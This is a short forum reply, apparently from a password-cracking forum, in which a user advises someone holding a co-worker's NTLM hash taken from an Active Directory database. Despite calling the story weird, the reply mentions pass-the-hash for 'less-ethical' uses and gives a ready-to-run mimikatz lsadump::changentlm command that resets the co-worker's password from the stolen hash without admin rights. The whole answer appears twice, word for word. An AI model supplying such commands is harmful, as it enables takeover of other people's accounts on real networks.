01-03-2020, 09:43 AM
(This post was last modified: 01-03-2020, 10:01 AM by DanielG.
Edit Reason: clarification
)
I don't get what your goal is here, any domain admin can change the password of the account so that is your best option.
You don't need to crack the NTLM hash for most other 'less-ethical' use cases (using pass-the-hash attack). The NTLM hash can be used to do a lot of things (for example authenticate on those devices).
Anyway, if you have the current NTLM hash and want to change the password on the AD (and for some reason you are not an admin) use this:
https://blog.stealthbits.com/manipulatin...ChangeNTLM
You can use mimikatz to run the command lsadump::changentlm /server:that.ad.server.of.yours /user:co-worker /old:extracted.ntlm.from.ntds.dit /newpassword:TurboMatt from any connected computer (you can also do the same with DSInternals you already used).
But again, this is a weird story considering any administrator can change the account password.
You don't need to crack the NTLM hash for most other 'less-ethical' use cases (using pass-the-hash attack). The NTLM hash can be used to do a lot of things (for example authenticate on those devices).
Anyway, if you have the current NTLM hash and want to change the password on the AD (and for some reason you are not an admin) use this:
https://blog.stealthbits.com/manipulatin...ChangeNTLM
You can use mimikatz to run the command lsadump::changentlm /server:that.ad.server.of.yours /user:co-worker /old:extracted.ntlm.from.ntds.dit /newpassword:TurboMatt from any connected computer (you can also do the same with DSInternals you already used).
But again, this is a weird story considering any administrator can change the account password.